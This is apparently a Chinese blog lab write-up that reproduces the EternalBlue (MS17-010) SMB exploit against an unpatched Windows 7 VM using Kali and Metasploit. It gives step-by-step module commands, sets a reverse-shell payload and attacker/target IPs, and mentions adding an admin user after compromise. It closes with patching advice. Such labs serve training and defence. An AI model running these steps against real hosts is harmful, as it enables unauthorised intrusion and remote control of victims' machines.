阿布在漏洞复现---永恒之蓝 MS17-010
永恒之蓝复现
1.漏洞理论
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
2.复现环境
攻击机器:kali(192.168.65.151)
实验靶机:官方原版WIN7(192.168.65.153),关闭防火墙,未打补丁
3.实验步骤
信息收集:
1)kali环境下用nmap扫描靶机;
默认扫描sS
2) kali终端打开metasploit;
输入命令:msfconsole
3) 搜索ms17-010相关模块;
search ms17-010
利用上图框出来的模块,进行漏洞发现
这个模块就是一个ms17-010漏洞扫描模块,利用它可以确定目标是否存在该漏洞
use auxiliary/scanner/smb/smb_ms17_010
4) 查看需要配置那些参数;
show options
由此可见,需要配置rhosts这个参数,这个参数就是即将要扫描的网段,如果只有一个主机,只需要给出该主机的IP得知
5) 设置IP地址,并启用扫描;
set rhosts 192.168.146.136
exploit
如果是出现+则表明该主机存在445端口漏洞
尝试攻击:
6)接下来我们使用漏洞利用模块来进行getshell
6.1选择模块:use exploit/windows/smb/ms17_010_eternalblue
6.2选择payload:set payload generic/shell_reverse_tcp
6.3设置rhost(靶机ip):set rhost 192.168.146.136
6.4设置lhost(攻击机ip): set lhost 192.168.146.128
6.5实施攻击:exploit
这一句表示永恒之蓝攻击成功
这一句建立一个会话名称为session的会话
给靶机添加用户
给添加本地权限
添加成功
永恒之蓝事件后续:
微软已于2017 年 3 月 14 日发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏洞修复。
- 【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法
- 永恒之蓝漏洞复现(ms17-010) 及windows日志对比分析
- ms17-010永恒之蓝漏洞复现
- 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
- 【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞
- MS17-010 永恒之蓝漏洞利用
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
- ms17-010漏洞复现
- 永恒之蓝 ms17_010漏洞的利用 msf
- ms17_010漏洞复现
- 试试MSF的ms17-010永恒之蓝漏洞利用
- 【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞
- ms17-010永恒之蓝漏洞利用
- 使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
- ms17_010复现
- 关于 永恒之蓝 和 MS17-010 补丁
- MS17-010漏洞利用工具系统入侵(实测)
- MS17-010特别版补丁NSA漏洞
- ms17-010复现